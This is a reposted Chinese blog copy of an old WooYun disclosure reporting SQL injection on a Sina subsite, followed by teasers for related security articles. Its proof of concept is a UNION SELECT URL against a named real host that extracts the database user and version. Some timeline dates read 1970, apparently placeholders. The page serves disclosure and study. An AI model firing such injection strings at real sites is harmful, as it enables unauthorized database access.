新浪某分站存在注入漏洞

最新推荐文章于 2025-12-03 12:41:58 发布
原创 最新推荐文章于 2025-12-03 12:41:58 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #hack #网络安全 #wooyun

漏洞详情

披露状态:

2010-07-26: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-25: 细节向公众公开

简要描述:

新浪某分站存在注入漏洞

详细说明:

新浪某分站存在注入漏洞

漏洞证明:

http://pn.sina.com.cn/reg_info.php?pid=10&tids=17&id=59+and+1=2+union+select+1,2,3,4,5,concat(user(),0x3a,version()),7,8,9,10

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

Sword-heart
关注
精选资源
杰迅CMS全国城市分站系统
08-29
杰迅CMS全国城市分站系统 杰迅CMS是一款基于TP5.0框架为核心开发的一套免费+开源的城市分站内容管理系统。团队自2013年起自主研发城市分站内容管理系统,5年来,修复升级上千个功能性问题 1、适用场景 城市分站系统...
精选资源
dede源码多城市分站插件安装说明.zip
04-22
【标题】"dede源码多城市分站插件安装说明.zip" 提供的是一个针对织梦(DedeCMS)内容管理系统(CMS)的插件,该插件旨在实现多城市分站的功能。织梦(DedeCMS)是一款广泛使用的开源PHP CMS,它允许用户方便地构建...
CRLF注入漏洞
kjssy的博客
08-19 878
所以,一旦我们能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting,简称HRS。说到这里应该就很清楚了,HRS不正是注入HTTP头的一个漏洞吗,我们可以将X-XSS-Protection:0注入到数据包中,再用两个CRLF来注入XSS代码,这样就成功地绕过了浏览器filter,并且执行我们的反射型XSS。HRS是比XSS危害更大的安全问题,具体是为什么,我们往下看。
各种解析漏洞拿shell
冰河的专栏
11-18 2139
 一、IIS 6.0解析漏洞 IIS 6.0解析利用方法有两种1.目录解析 /xx.asp/xx.jpg2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 wooyun.asp,那么 /wooyun.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以...
新浪某站CRLF Injection导致的安全问题
学医救不了中国人
06-28 3010
原创:https://www.cnblogs.com/studyskill/p/6972576.html 新浪某站CRLF Injection导致的安全问题 PHITHON  2014 六月 30 06:45   阅读:3714    网络安全    HRS, CRLF, xss ...
注入笔记(非sql注入
yida223的博客
05-12 966
XML注入 引用:https://www.freebuf.com/vuls/175451.html 作者:Hu3sky 0X01 xxe漏洞介绍 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻...
解析漏洞总结
qq_35420342的博客
04-21 327
一、IIS 5.x/6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析sp.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 sp.asp,那么/sp.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你...
CRLF Injection漏洞的利用与实例分析
anlalu233的博客
09-30 1017
记者地址:http://drops.wooyun.org/papers/2466 0x00背景 我看区域中(http://zone.wooyun.org/content/13323)还有一些同学对于这个突破不甚了解,甚至分不清它与CSRF,我详细说一下吧。 在HTTP协议中,HTTP标头与HTTP正文是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取回HTTP内容并显示出来的。CRLF是“回车+换行”(\ r \ n)的简称。 。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶...
CRLF注入
墨鱼菜鸡
06-05 201
CRLF是 回车+换行(\r\n)的简称。在HTTP协议中,HTTPHeader 与 HTTPBody 是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话 Cookie 或...
[轉]新浪某站CRLF Injection导致的安全问题
03-26 248
最近在修一些veracode報過來的issue,其中一個是crlf injection,不太懂就去查了一下 ============================================================= 原文鏈接:https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html 作者:PHITHON ...
业务安全漏洞挖掘归纳总结
weixin_34249367的博客
06-22 314
转自乌云,原文链接http://drops.wooyun.org/web/6917,默哀 身份认证安全 1.暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方,使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http://zone.wooyun.org...
精选资源
织梦全国多城市分站地区插件(带教程)别轻易尝试_经济_织梦分站_织梦全国分站_全国分站_
09-29
【标题】"织梦全国多城市分站地区插件(带教程)别轻易尝试" 提供的是一个针对织梦(DedeCMS)内容管理系统开发的插件,该插件允许用户构建一个支持全国多城市分站的网站。织梦CMS是一款广泛使用的开源PHP+MySQL的...
pbootcms多城市分站插件,站群SEO搜索引擎优化
05-05
自动生成任意城市的分站链接,同时支持分站之间同页跳转。 配合{city}标签,无需重复添加资料,自动生成带有城市名称的地区关键词,便于SEO针对城市关键词进行优化。
网络安全防护指南:筑牢网络安全防线(510)
2509_94105975的博客
12-01 758
网络是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息收集、存储、传输、交换、处理的系统。在当今数字化时代,网络已经成为人们生活和工作中不可或缺的一部分。它连接了世界各地的人们,使得信息的传递和交流变得更加便捷高效。
想入门网络安全?CSB网安基地学习体验深度解析
白帽子凯哥哥的博客
12-02 338
想入门网络安全?CSB网安基地学习体验深度解析
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1665
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全系列:系统后门与持久化技术深度解析
最新发布
PyHaVolask的博客
12-03 1313
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
中科大计算机网络——网络安全
Tandy12356_的博客
12-01 351
使用checksum作为H不合适,因为很容易反向计算出m'与m有同样的报文摘要。为何不能让你逆向推导出报文m?防止你用不合法的协议m'在法庭上要挟签名人。使用公开密钥加密体系作认证的缺陷:中间人攻击。本质原因:Bob没有拿到真正Alice的公钥。解决方案:让Bob可靠地拿到Alice的公钥。只要根是可靠的,后面大概率也是可靠的。求幂次方和求模运算代价非常大。
WAP手机卡盟源码分享:打造无限分站
“无限搭分站”是一个很有趣的点,它可能意味着源码提供了一种技术或者商业模式,允许用户搭建多个分站,且分站的数量没有上限。这在某些情况下可能有助于扩展业务,实现服务的快速复制和分布。无限搭分站的特点...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值